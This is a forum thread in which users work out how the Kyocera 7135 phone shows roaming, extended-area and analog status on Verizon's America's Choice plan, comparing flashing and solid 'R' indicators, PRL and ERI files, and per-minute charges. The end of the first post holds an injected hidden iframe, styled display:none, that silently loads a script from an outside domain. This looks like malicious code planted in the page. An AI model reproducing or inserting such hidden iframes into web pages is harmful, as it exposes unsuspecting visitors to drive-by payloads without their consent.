+ Reply to Thread
Page 1 of 2 1 2 LastLast

7135 Roaming question for travelers

I have not traveled (outside of my "Home" area) with the 7135 yet. I am on VZW's America's Choice plan. Will the phone notify me (on the phone screen) when I am in "Extended Area" and when I'm in "Roam"?

On my Moto 270C there is a "Verizon Wireless" banner that changes to notify what calling area you are in. Was just wondering if this phone does the same.

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Not sure about extended area, but I was out of state for a few days, and the 7135 shows an "R" in the caller ID window and on the phone screen when roaming.

Shouldn't the status LED blink an amber color during roaming?

According to the manual, it blinks yellow when you receive a call and stays yellow during the call (when you are roaming). There does not seem to be an "extended area" or an "analog" indicator. This is troubling for those of us who have to talk on a VZW partner network or pay $0.69/min.

Well I answered one question. According to the phone reference guide, the absence of the "D" on the display would indicate analog mode.

(Doh!)

But it still doesn't answer what notification is given in an extended area.

If "normal" behavior can be expected, then I'd think that the "R" would flash in an extended home area. That's the behaviour of most of the newer phones that I've seen, including my StarTac.
    Sorry, but I no longer make 7135 headset adapters.

I hope you're right, that would be cool. If anyone can confirm this please respond.

I live in Houston and probably would have to travel about 100+ miles just to get out of the "home" area.

Bones, your gonna have to wait for a Verizon specific configuration to get it to do that. It requires not only the Verizon PRL, but a 2nd file that has this "extended" data for your screen based on your roaming situation. That extra file is not in the ALLTEL handsets.

Hotsync, do you think that is something that will be available OTA once VZW starts pushing these puppies?

On the 6035, you can have it do a different kind of ring when an incoming call comes while you are roaming and you can have it chirp an alert when you leave a digital area and begin roaming (I think). Same for the 7135?
    ~'kito
    pdaPhoneHome Moderator

To get the the Enhanced Roaming Indicator (ERI) working, you need three things: 1)an ERI-enhanced Preferred Roaming List (PRL), 2)the ERI list, and 3)ERI needs to be enabled in the the phone's programming. If you are on America's Choice, chances are you already have the necessary PRL, but you can't get the ERI list over-the-air, and I don't think Verizon stores have the tools to enable ERI in the programming. Alltel's phones won't have ERI enabled.
    LART 'em all! Let /root grep 'em out!

This would be great (or not so great) if someone could confirm what I_Machine is saying. If true, it would be the first concrete thing I'm seeing that could *not* be fixed on phones purchased now, even at a Verizon store...

I just went roaming with a 7135 and here is what I observed.
    1. There is the flashing R and the solid R for what I assume is the preferred roaming and the true roaming.
    2. The phone makes a chirping sound on an incoming call when the R is on in either mode.
    3. I don't recall noticing the amber light, but, it could have been there.
    4. On several times, I had a blinking R and made a call and then I would notice the R had stopped blinking!!
    5. I spent about 24 hours is Hattiesburg, MS and observed the following. There were Sprint signs all over the place. My phone had a blinking R and a D showing in the display. Two friends had verizon phones, I don't know the model, but I think they were Motorola phones, and thier phone were showing Analog. I have the AC plan. I don't know what they have. Seems like we should have been receiving the same indicators.

bg1811, thanks for posting your findings. I would hope that the blinking R is Extended and the steady R is outside AC coverage. The way it probably should work is when you have a D and a R together, you are digital roaming and therefore in an Extended area. When the D is gone and the R remains, you are analog roaming and paying $.69/min. According to what Hotsync said, this may all be irrelevant, though...

The whole AC thing is confusing at best, even with a VZW handset. I have a Moto 270C on AC (for work) and sometimes I'll switch from Extended to Roam for no apparent reason. I might just switch to NSR until VZW starts selling this phone...

Originally posted by bones boy
    bg1811, thanks for posting your findings. I would hope that the blinking R is Extended and the steady R is outside AC coverage. The way it probably should work is when you have a D and a R together, you are digital roaming and therefore in an Extended area. When the D is gone and the R remains, you are analog roaming and paying $.69/min. According to what Hotsync said, this may all be irrelevant, though...

The whole AC thing is confusing at best, even with a VZW handset. I have a Moto 270C on AC (for work) and sometimes I'll switch from Extended to Roam for no apparent reason. I might just switch to NSR until VZW starts selling this phone...
    it is actually pretty simple. I have never had any problems. It doesn't matter if you are on Digital or Analog. If you have nothing, extended area, or a flashing Roam or 'R' you are NOT Roaming. If you have a solid 'R' or 'ROAM' you ARE roaming.

If you have nothing, extended area, or a flashing Roam or 'R' you are NOT Roaming. If you have a solid 'R' or 'ROAM' you ARE roaming.

So is it just simply, flashing "R" is AC and steady "R" is not (like bg1811 initially said)? To my knowledge, there are no "ROAM" or "extended area" indicators on the 7135.

So is it just simply, flashing "R" is AC and steady "R" is not (like bg1811 initially said)? To my knowledge, there are no "ROAM" or "extended area" indicators on the 7135.
    Correct. But in his message it almost sounded like he thought analog would be a charge---it doesn't matter whether it is analog or digital just weather the R is flashing or not. (the outside indicator will not show this only the inside screen).

Well I did hear from the VZW rep that if you are on AC and you are in analog coverage that it's always considered roaming. But that's OT.

And of course, thanks for your input! :p

Well I did hear from the VZW rep that if you are on AC and you are in analog coverage that it's always considered roaming. But that's OT.

And of course, thanks for your input! :p
    No he is incorrect. Many if not most of the areas here in Wyoming are Analog and we do NOT get charged for roaming on these (or for that matter Nebraska and Montana--all have tons of Analog coverage)

It just all depends on whether the analog is a Verizon or a company that Verizon has an agreement with not if it is digital or not--

Well, it wouldn't be the first time that a cellular sales rep knew less than the peeps in this forum...

Thanks!